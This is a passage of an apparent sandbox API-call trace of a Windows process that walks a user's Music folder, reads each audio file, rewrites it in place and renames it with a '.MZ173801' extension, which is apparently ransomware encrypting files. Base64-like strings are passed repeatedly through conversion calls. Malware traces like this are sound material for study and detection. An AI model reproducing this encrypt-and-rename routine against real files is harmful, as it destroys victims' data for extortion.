TE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242e95c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.458] GetCurrentThreadId () returned 0x1358 [0117.458] GetCurrentThreadId () returned 0x1358 [0117.458] GetCurrentThreadId () returned 0x1358 [0117.458] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.458] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242eccc, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.458] GetCurrentThreadId () returned 0x1358 [0117.458] GetCurrentThreadId () returned 0x1358 [0117.458] GetCurrentThreadId () returned 0x1358 [0117.458] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\LWQBu.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\lwqbu.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0117.459] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f140*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f140*=0) returned 0x0 [0117.459] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0117.459] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x15a8a [0117.459] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0117.459] ReadFile (in: hFile=0x408, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0x15a8a, lpNumberOfBytesRead=0x19f14c, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f14c*=0x15a8a, lpOverlapped=0x0) returned 1 [0117.460] CloseHandle (hObject=0x408) returned 1 [0117.462] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\LWQBu.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\lwqbu.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0117.463] WriteFile (in: hFile=0x408, lpBuffer=0x23ba7d0*, nNumberOfBytesToWrite=0x15a8a, lpNumberOfBytesWritten=0x19f158, lpOverlapped=0x0 | out: lpBuffer=0x23ba7d0*, lpNumberOfBytesWritten=0x19f158*=0x15a8a, lpOverlapped=0x0) returned 1 [0117.465] CloseHandle (hObject=0x408) returned 1 [0117.467] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\LWQBu.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\lwqbu.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\LWQBu.mp3.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\lwqbu.mp3.mz173801")) returned 1 [0117.468] GetCurrentThreadId () returned 0x1358 [0117.468] GetCurrentThreadId () returned 0x1358 [0117.468] GetCurrentThreadId () returned 0x1358 [0117.468] GetCurrentThreadId () returned 0x1358 [0117.468] GetCurrentThreadId () returned 0x1358 [0117.468] GetCurrentThreadId () returned 0x1358 [0117.468] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63e858f0, ftCreationTime.dwHighDateTime=0x1d5e3cd, ftLastAccessTime.dwLowDateTime=0xc69396d0, ftLastAccessTime.dwHighDateTime=0x1d5ea1d, ftLastWriteTime.dwLowDateTime=0xc69396d0, ftLastWriteTime.dwHighDateTime=0x1d5ea1d, nFileSizeHigh=0x0, nFileSizeLow=0xd55b, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="o87Ff8jxDauutKhIzSH.m4a", cAlternateFileName="O87FF8~1.M4A")) returned 1 [0117.468] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0117.468] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0117.468] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\o87Ff8jxDauutKhIzSH.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\o87ff8jxdauutkhizsh.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19f18c | out: lpFileInformation=0x19f18c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63e858f0, ftCreationTime.dwHighDateTime=0x1d5e3cd, ftLastAccessTime.dwLowDateTime=0xc69396d0, ftLastAccessTime.dwHighDateTime=0x1d5ea1d, ftLastWriteTime.dwLowDateTime=0xc69396d0, ftLastWriteTime.dwHighDateTime=0x1d5ea1d, nFileSizeHigh=0x0, nFileSizeLow=0xd55b)) returned 1 [0117.469] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.469] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.469] GetCurrentThreadId () returned 0x1358 [0117.469] GetCurrentThreadId () returned 0x1358 [0117.469] GetCurrentThreadId () returned 0x1358 [0117.470] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.470] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.470] GetCurrentThreadId () returned 0x1358 [0117.470] GetCurrentThreadId () returned 0x1358 [0117.470] GetCurrentThreadId () returned 0x1358 [0117.470] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\o87Ff8jxDauutKhIzSH.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\o87ff8jxdauutkhizsh.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0117.470] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f140*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f140*=0) returned 0x0 [0117.470] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0117.470] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0xd55b [0117.470] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0117.470] ReadFile (in: hFile=0x408, lpBuffer=0x2432c60, nNumberOfBytesToRead=0xd55b, lpNumberOfBytesRead=0x19f14c, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f14c*=0xd55b, lpOverlapped=0x0) returned 1 [0117.471] CloseHandle (hObject=0x408) returned 1 [0117.472] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\o87Ff8jxDauutKhIzSH.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\o87ff8jxdauutkhizsh.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0117.474] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xd55b, lpNumberOfBytesWritten=0x19f158, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f158*=0xd55b, lpOverlapped=0x0) returned 1 [0117.475] CloseHandle (hObject=0x408) returned 1 [0117.477] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\o87Ff8jxDauutKhIzSH.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\o87ff8jxdauutkhizsh.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\o87Ff8jxDauutKhIzSH.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\o87ff8jxdauutkhizsh.m4a.mz173801")) returned 1 [0117.485] GetCurrentThreadId () returned 0x1358 [0117.485] GetCurrentThreadId () returned 0x1358 [0117.485] GetCurrentThreadId () returned 0x1358 [0117.485] GetCurrentThreadId () returned 0x1358 [0117.485] GetCurrentThreadId () returned 0x1358 [0117.486] GetCurrentThreadId () returned 0x1358 [0117.486] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee99b50, ftCreationTime.dwHighDateTime=0x1d5e131, ftLastAccessTime.dwLowDateTime=0x59d9f570, ftLastAccessTime.dwHighDateTime=0x1d5e56d, ftLastWriteTime.dwLowDateTime=0x59d9f570, ftLastWriteTime.dwHighDateTime=0x1d5e56d, nFileSizeHigh=0x0, nFileSizeLow=0x618, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="_HdsGmu6OGd.wav", cAlternateFileName="_HDSGM~1.WAV")) returned 1 [0117.486] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0117.486] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0117.486] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\_HdsGmu6OGd.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\_hdsgmu6ogd.wav"), fInfoLevelId=0x0, lpFileInformation=0x19f18c | out: lpFileInformation=0x19f18c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee99b50, 